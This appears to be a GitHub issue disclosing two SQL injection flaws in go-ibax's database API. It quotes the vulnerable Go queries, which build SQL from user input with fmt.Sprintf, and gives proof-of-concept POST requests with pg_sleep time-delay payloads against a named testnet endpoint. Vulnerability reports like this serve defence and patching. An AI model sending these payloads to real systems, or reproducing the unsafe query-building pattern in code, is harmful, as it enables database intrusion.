SQL Injection vulnerabilities

[QSec-Team]

Describe the bug

There are two SQL injection vulnerabilities

First place

file:

go-ibax/packages/api/database.go

Line 92 in 6bac746

query := fmt.Sprintf("SELECT tablename from pg_tables where schemaname ='public' and tablename like %s order by %s offset %d limit %d", "'%"+form.Table_name+"%'", form.Order, (form.Page-1)*form.Limit, form.Limit)

query := fmt.Sprintf("SELECT tablename from pg_tables where schemaname ='public' and tablename like %s order by %s offset %d limit %d", "'%"+form.Table_name+"%'", form.Order, (form.Page-1)*form.Limit, form.Limit)

POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo

data: page=1&limit=1&order=1; select pg_sleep(3)--

Second place

file:

go-ibax/packages/api/database.go

Line 120 in 6bac746

sqlQuery := fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name='%s' ORDER BY %s", form.Table_name, order)

sqlQuery := fmt.Sprintf("SELECT column_name,data_type,column_default FROM information_schema.columns WHERE table_name='%s' ORDER BY %s", form.Table_name, order)

POC:
POST https://testnet-hk1.ibax.network:5079/api/v2/open/columnsInfo

data: table_name=1; select pg_sleep(3)--

Reproduction

POST https://testnet-hk1.ibax.network:5079/api/v2/open/tablesInfo

data: page=1&limit=1&order=1; select pg_sleep(3)--

as you can see, when I use pg_sleep, the request is delayed 3s.

System Info

*

Logs

No response

Validations

• Read the docs.
• Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
• Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
• The provided reproduction is a minimal reproducible example of the bug.

[jiashaoxiong1998]

666